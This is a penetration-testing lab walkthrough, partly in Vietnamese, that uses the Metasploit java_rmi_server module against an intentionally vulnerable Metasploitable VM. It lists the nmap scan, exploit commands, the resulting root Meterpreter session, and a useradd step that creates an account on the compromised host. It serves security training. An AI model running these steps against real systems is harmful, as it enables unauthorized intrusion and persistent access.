Bài Thực Hành Metasploit Framework Lesson 5 : Exploiting the RMI Registration Server

---

Section 0. Background Information

1. Metasploitable 
   • Metasploitable is an intentionally vulnerable Linux virtual machine.
   • This VM can be used to conduct security training, test security tools, and practice common penetration testing techniques.
   • http://www.offensive-security.com/metasploit-unleashed/Metasploitable
2. Pre-Requisite Lab
   • Metasploitable  : Lesson 1: Downloading and Configuring
    
3. What RMI?
   • The RMI protocol makes use of two other protocols for its on-the-wire format: Java Object Serialization and HTTP. The Object Serialization protocol is used to marshal call and return data. The HTTP protocol is used to "POST" a remote method invocation and obtain return data when circumstances warrant. Each protocol is documented as a separate grammar. Nonterminal symbols in production rules may refer to rules governed by another protocol (either Object Serialization or HTTP). When a protocol boundary is crossed, subsequent productions use that embedded protocol.
4. Lab Notes
   • In this lab we will do the following:
     1. Run an intense NMAP Scan on the Metasploitable VM
     2. Search for the RMI Service
     3. Exploit the RMI Server and obtain root.
5. Legal Disclaimer - Bài lab chỉ dùng cho môi trường học tập 

Section 1. Start Up the Metasploitable VM

1. Start Up VMWare Player
   • Instructions:
     1. Click the Start Button
     2. Type Vmplayer in the search box
     3. Click on Vmplayer
   • 
2. Open a Virtual Machine
   • Instructions:
     1. Click on Open a Virtual Machine
   • 
3. Open the Metasploitable VM
   • Instructions:
     1. Navigate to where the Metasploitable VM is located
     2. Click on on the Metasploitable VM
     3. Click on the Open Button
   • 
4. Edit the Metasploitable VM
   • Instructions:
     1. Select Metasploitable2-Linux VM
     2. Click Edit virtual machine settings
   • 
5. Edit the Metasploitable VM
   • Instructions:
     1. Click on "Network Adapter NAT"
     2. Select the radio button "Bridged: Connected directly to the physical network"
     3. Click on the OK button
   • Warning:
     • By changing from NAT to Bridged opens the VM and network up to potential attacks.
     • To maintain a safe network, you could (1) skip this section and only use the host-only network, (2) unplug your router from the internet, (3) use an ACL to not allow traffic into your network, etc.
   • 
6. Play the Metasploitable VM
   • Instructions:
     1. Click on the Metasploitable VM
     2. Click on Play virtual machine
   • 

Section 2. Determine Metasploitable IP Address

1. Logging into Metasploitable
   • Instructions
     1. Username: msfadmin
     2. Password: msfadmin or whatever you changed it to in lesson 1.
   • 
2. Change the msfadmin password
   • Instructions:
     1. ifconfig -a
   • Note(FYI):
     • This is the IP Address of the Victim Machine.
     • My IP Address is 192.168.1.106.
     • Record your IP Address.
   • 

Section 4. Start Up the BackTrack5R1 VM

1. Start Up VMWare Player
   • Instructions:
     1. Click the Start Button
     2. Type Vmplayer in the search box
     3. Click on Vmplayer
   • 
2. Open a Virtual Machine
   • Instructions:
     1. Click on Open a Virtual Machine
   • 
3. Open the BackTrack5R1 VM
   • Instructions:
     1. Navigate to where the BackTrack5R1 VM is located
     2. Click on on the BackTrack5R1 VM
     3. Click on the Open Button
   • 
4. Edit the BackTrack5R1 VM
   • Instructions:
     1. Select BackTrack5R1 VM
     2. Click Edit virtual machine settings
   • 
5. Edit Virtual Machine Settings
   • Instructions:
     1. Click on Network Adapter
     2. Click on the Bridged Radio button
     3. Click on the OK Button
   • 
6. Play the BackTrack5R1 VM
   • Instructions:
     1. Click on the BackTrack5R1 VM
     2. Click on Play virtual machine
   • 
7. Login to BackTrack
   • Instructions:
     1. Login: root
     2. Password: toor or <whatever you changed it to>.
   • 
8. Bring up the GNOME
   • Instructions:
     1. Type startx
   • 
9. Start up a terminal window
   • Instructions:
     1. Click on the Terminal Window
   • 
10. Obtain the IP Address
    • Instructions:
      1. ifconfig -a
    • Note(FYI):
      • My IP address 192.168.1.111
      • In your case, it will probably be different.
      • This is the machine that will be use to attack the victim machine (Metasploitable).
    • 

Section 5. Scanning the Victim with NMAP

1. Run Intense NMAP Scan on the Metasploitable VM
   • Note(FYI):
     • Replace 192.168.1.106 with the Metasploitable IP Address obtained from (Section 2, Step 2).
     • This intense NMAP scan could take 3 to 5 minutes to run.
   • Instructions:
     1. nmap -p 1-65535 -T4 -A -v 192.168.1.106 2>&1 | tee /var/tmp/scan.txt
   • 
2. Looking for rpcinfo, nfs and ssh
   • Instructions:
     1. cd /var/tmp
     2. grep -i rmi scan.txt
   • Note(FYI):
     • rmiregistry server runs on port 1099 on TCP.
   • 

Section 6. Exploit the RMI Registry Server

1. Start the Metasploit Console
   • Instructions:
     1. msfconsole
   • 
2. Use Java RMI Server Exploit
   • Instructions:
     1. search java_rmi
     2. use exploit/multi/misc/java_rmi_server
   • 
3. Set RHOST (Victim IP Address)
   • Instructions:
     1. show options
     2. set RHOST 192.168.1.106
   Note(FYI):
   • Replace 192.168.1.106 with the Metasploitable IP Address obtained from (Section 2, Step 2).
   • 
4. Exploit
   • Instructions:
     1. exploit
   Note(FYI):
   • Now you should see a Meterpreter session opened between BackTrack to Metasploitable.
   • 
5. Help
   • Instructions:
     1. help
   Note(FYI):
   • The help command will provide all the available options that can be used for this particular exploit.
   • 
6. Got root?
   • Instructions:
     1. ifconfig
     2. getuid
   Note(FYI):
   • Very kool, you should see that you now have root access.
   • 

Section 7. Proof of Lab

1. Proof of Lab
   • Instructions:
     1. shell
     2. whoami
     3. useradd -m -d /home/student -c "Student Hacker" -s /bin/bash student
     4. grep student /etc/passwd
     5. date
     6. echo "Your Name"
        • Put in your actual name in place of "Your Name"
        • e.g., echo "John Gray"
   • Proof of Lab Instructions
     1. Press the <Ctrl> and <Alt> key at the same time.
     2. Press the <PrtScn> key.
     3. Paste into a word document
     4. Upload to website Www.AnToanThongTin.Edu.VN
   •